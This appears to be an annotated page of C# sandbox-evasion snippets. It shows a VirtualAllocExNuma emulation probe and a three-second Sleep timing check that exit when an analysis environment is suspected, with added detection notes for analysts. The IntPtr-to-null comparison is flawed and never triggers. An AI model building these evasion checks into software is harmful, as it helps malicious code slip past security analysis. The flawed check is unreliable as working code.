Dynamic Analysis
Sandbox Detection
Resources
# Sandbox evasion check: calls a rarely emulated API (VirtualAllocExNuma) in an attempt to bypass heuristic/behavioural analysis
// P/Invoke declaration for kernel32!VirtualAllocExNuma, the NUMA-aware variant of VirtualAllocEx.
// Detection note: managed code seldom needs this API, so its import in a small .NET binary
// is worth flagging in static triage and in API-call telemetry (heuristic, not proof of malice).
[DllImport("kernel32.dll")]
private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
// Requests 0x1000 bytes in the current process, at a system-chosen address (IntPtr.Zero),
// with 0x3000 (MEM_COMMIT | MEM_RESERVE) and 0x4 (PAGE_READWRITE), preferring NUMA node 0.
// GetCurrentProcess() is the kernel32 import declared further down the page.
// The returned pointer is only used as an environment probe here; it is not written to or freed in this snippet.
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4, 0);
// The probe result is compared with null; when that comparison holds, the snippet
// prints its failure marker and returns, so nothing after this point runs.
if (mem == null)
{
// The console string below is a stable indicator an analyst can search for in samples built from this page.
Console.WriteLine("[-] VirtualAllocExNuma check failed.");
return;
}
# Sleeps for 3 seconds to evade in-memory scanning, then checks whether the emulator fast-forwarded through the sleep call
// P/Invoke declaration for kernel32!Sleep, called directly rather than through Thread.Sleep.
[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);
// P/Invoke declaration for kernel32!GetCurrentProcess; supplies the process handle passed to VirtualAllocExNuma.
[DllImport("kernel32.dll")]
static extern IntPtr GetCurrentProcess();
// Record the local wall-clock time before the delay.
DateTime time1 = DateTime.Now;
// Request a 3000 ms delay.
Sleep(3000);
// Elapsed wall-clock time in seconds since time1 (despite the name, time2 is a duration, not a timestamp).
double time2 = DateTime.Now.Subtract(time1).TotalSeconds;
// If fewer than 2.5 seconds appear to have elapsed, the delay is treated as having been skipped
// or accelerated: the snippet prints its failure marker and returns.
// Detection note: a fixed sleep followed immediately by a wall-clock comparison is a recognisable
// timing-check pattern; analysis environments that shorten sleeps need to keep the clock sources
// the sample can read consistent with the requested delay, or the shortcut is observable.
if (time2 < 2.5)
{
// The console string below is a stable indicator an analyst can search for in samples built from this page.
Console.WriteLine("[-] Sleep check failed.");
return;
}